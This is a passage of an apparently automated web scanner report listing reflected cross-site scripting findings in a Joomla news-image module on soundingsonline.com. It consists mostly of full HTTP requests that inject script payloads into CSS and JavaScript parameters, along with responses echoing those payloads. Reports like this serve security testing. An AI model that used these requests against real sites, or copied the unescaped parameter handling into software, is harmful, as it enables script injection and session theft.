X-Powered-By: PHP/5.2.6
Content-Type: text/css

div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 27083595<script>alert(1)</script>8968cd8d5c9px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0px;
   left: 0px;
   position: absolute;
   display: block;
}

div.gk_news_image_1_wrapper h2 {
   margin-bottom: 15px;

...[SNIP]...

4.1403. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [module_width parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the module_width request parameter is copied into the HTML document as plain text between tags. The payload 430cc<script>alert(1)</script>0b9b8e7996f was submitted in the module_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615430cc<script>alert(1)</script>0b9b8e7996f&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css

div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615430cc<script>alert(1)</script>0b9b8e7996fpx;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0px;
   left: 0px;
   position: absolute;
   display: block;
}

div.gk_news_image_1_wrapper h2 {
   margi
...[SNIP]...

4.1404. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_bgcolor parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the text_block_bgcolor request parameter is copied into the HTML document as plain text between tags. The payload c2c09<script>alert(1)</script>e6026c228c was submitted in the text_block_bgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffffc2c09<script>alert(1)</script>e6026c228c&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css

div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
_datas {
   display: none;
}

.gk_news_image_1_text_bg {
   padding-right: 10px;
   padding-left: 10px;
   width: 195px;
   height: 270px;
   position: absolute;
   left: 405px;
   background-color: #ffffffc2c09<script>alert(1)</script>e6026c228c;
   opacity: 0;
}

div.gk_news_image_1_text {
   padding: 10px;
   overflow: hidden;
   width: 185px;
   height: 206px;
   position: absolute;
   left: 405px;
   top: 0px;
}

a.gk_news_image_1_prev, a.
...[SNIP]...

4.1405. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_margin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the text_block_margin request parameter is copied into the HTML document as plain text between tags. The payload 92616<script>alert(1)</script>ce159aaf62 was submitted in the text_block_margin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=40592616<script>alert(1)</script>ce159aaf62&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css

div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...

}

div.gk_news_image_1_text_datas {
   display: none;
}

.gk_news_image_1_text_bg {
   padding-right: 10px;
   padding-left: 10px;
   width: 195px;
   height: 270px;
   position: absolute;
   left: 40592616<script>alert(1)</script>ce159aaf62px;
   background-color: #ffffff;
   opacity: 0;
}

div.gk_news_image_1_text {
   padding: 10px;
   overflow: hidden;
   width: 185px;
   height: 206px;
   position: absolute;
   left: 40592616<script>
...[SNIP]...

4.1406. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_opacity parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the text_block_opacity request parameter is copied into the HTML document as plain text between tags. The payload 45c34<script>alert(1)</script>10eff4952b3 was submitted in the text_block_opacity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=045c34<script>alert(1)</script>10eff4952b3&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css

div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
play: none;
}

.gk_news_image_1_text_bg {
   padding-right: 10px;
   padding-left: 10px;
   width: 195px;
   height: 270px;
   position: absolute;
   left: 405px;
   background-color: #ffffff;
   opacity: 045c34<script>alert(1)</script>10eff4952b3;
}

div.gk_news_image_1_text {
   padding: 10px;
   overflow: hidden;
   width: 185px;
   height: 206px;
   position: absolute;
   left: 405px;
   top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_
...[SNIP]...

4.1407. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_width parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the text_block_width request parameter is copied into the HTML document as plain text between tags. The payload ef2d2<script>alert(1)</script>2b50e983568 was submitted in the text_block_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195ef2d2<script>alert(1)</script>2b50e983568&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css

div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
Arial, Helvetica, sans-serif;
   text-decoration: none;
}

div.gk_news_image_1_text_datas {
   display: none;
}

.gk_news_image_1_text_bg {
   padding-right: 10px;
   padding-left: 10px;
   width: 195ef2d2<script>alert(1)</script>2b50e983568px;
   height: 270px;
   position: absolute;
   left: 405px;
   background-color: #ffffff;
   opacity: 0;
}

div.gk_news_image_1_text {
   padding: 10px;
   overflow: hidden;
   width: 185px;
   height: 206
...[SNIP]...

4.1408. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_border parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the thumbnail_border request parameter is copied into the HTML document as plain text between tags. The payload 8fc44<script>alert(1)</script>3359efc16d3 was submitted in the thumbnail_border parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=18fc44<script>alert(1)</script>3359efc16d3&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css

div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
ws_image_1_thumbnails {
   bottom: 100px;
   margin-left: 10px;
   width: 195px;
   height: 90px;
   position: absolute;
   left: 405px;
   top: 204px;
}

.gk_news_image_1_thumb{
   margin: 5px;
   border: 18fc44<script>alert(1)</script>3359efc16d3px solid ;
   width: 66px;
   height: 44px;
   float: left;
   display:block;
}

.gk_news_image_1_tbo{
   width: 452px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

ul.gk_news_ima
...[SNIP]...

4.1409. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_height parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the thumbnail_height request parameter is copied into the HTML document as plain text between tags. The payload 9673e<script>alert(1)</script>59db9d4223c was submitted in the thumbnail_height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=449673e<script>alert(1)</script>59db9d4223c&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css

div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
gin-left: 10px;
   width: 195px;
   height: 449685px;
   position: absolute;
   left: 405px;
   top: -449425px;
}

.gk_news_image_1_thumb{
   margin: 5px;
   border: 1px solid ;
   width: 66px;
   height: 449673e<script>alert(1)</script>59db9d4223cpx;
   float: left;
   display:block;
}

.gk_news_image_1_tbo{
   width: 316px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

ul.gk_news_image_1_tick_buttons{
   position: absolut
...[SNIP]...

4.1410. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_margin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the thumbnail_margin request parameter is copied into the HTML document as plain text between tags. The payload 9dcc8<script>alert(1)</script>ff0b9230bba was submitted in the thumbnail_margin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=59dcc8<script>alert(1)</script>ff0b9230bba&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css

div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...

}

div.gk_news_image_1_thumbnails {
   bottom: 100px;
   margin-left: 10px;
   width: 195px;
   height: 164px;
   position: absolute;
   left: 405px;
   top: 96px;
}

.gk_news_image_1_thumb{
   margin: 59dcc8<script>alert(1)</script>ff0b9230bbapx;
   border: 1px solid ;
   width: 66px;
   height: 44px;
   float: left;
   display:block;
}

.gk_news_image_1_tbo{
   width: 748px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

...[SNIP]...

4.1411. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_width parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the thumbnail_width request parameter is copied into the HTML document as plain text between tags. The payload ba4ce<script>alert(1)</script>afde6d92280 was submitted in the thumbnail_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66ba4ce<script>alert(1)</script>afde6d92280&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css

div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
{
   bottom: 100px;
   margin-left: 10px;
   width: 195px;
   height: 56px;
   position: absolute;
   left: 405px;
   top: 204px;
}

.gk_news_image_1_thumb{
   margin: 5px;
   border: 1px solid ;
   width: 66ba4ce<script>alert(1)</script>afde6d92280px;
   height: 44px;
   float: left;
   display:block;
}

.gk_news_image_1_tbo{
   width: 316px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

ul.gk_news_image_1_tick_buttons{
   p
...[SNIP]...

4.1412. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [tick_x parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the tick_x request parameter is copied into the HTML document as plain text between tags. The payload 44675<script>alert(1)</script>e58bcc8132a was submitted in the tick_x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=40544675<script>alert(1)</script>e58bcc8132a&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css

div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
age_1_tbo{
   width: 316px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

ul.gk_news_image_1_tick_buttons{
   position: absolute;
   list-style-type: none;
   top: -22px;
   left: 40544675<script>alert(1)</script>e58bcc8132apx;
   margin: 0px;
   padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
   float: left;
   padding: 0px !important;
   margin-right: 3px;
}

div.gk_news_image_1_preloader{
   position: absolute;

...[SNIP]...

4.1413. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [tick_y parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the tick_y request parameter is copied into the HTML document as plain text between tags. The payload a1678<script>alert(1)</script>18a092c8e6e was submitted in the tick_y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22a1678<script>alert(1)</script>18a092c8e6e HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css

div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...

.gk_news_image_1_tbo{
   width: 316px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

ul.gk_news_image_1_tick_buttons{
   position: absolute;
   list-style-type: none;
   top: -22a1678<script>alert(1)</script>18a092c8e6epx;
   left: 405px;
   margin: 0px;
   padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
   float: left;
   padding: 0px !important;
   margin-right: 3px;
}

div.gk_news_image_1_preloader{
   positi
...[SNIP]...

4.1414. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_interval parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the animation_interval request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f0c62%3balert(1)//1b0eb0bc8a4 was submitted in the animation_interval parameter. This input was echoed as f0c62;alert(1)//1b0eb0bc8a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000f0c62%3balert(1)//1b0eb0bc8a4&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000f0c62;alert(1)//1b0eb0bc8a4,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
...[SNIP]...

4.1415. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_slide_speed parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the animation_slide_speed request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2ee3a%3balert(1)//1593c8e07e8 was submitted in the animation_slide_speed parameter. This input was echoed as 2ee3a;alert(1)//1593c8e07e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=5002ee3a%3balert(1)//1593c8e07e8&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
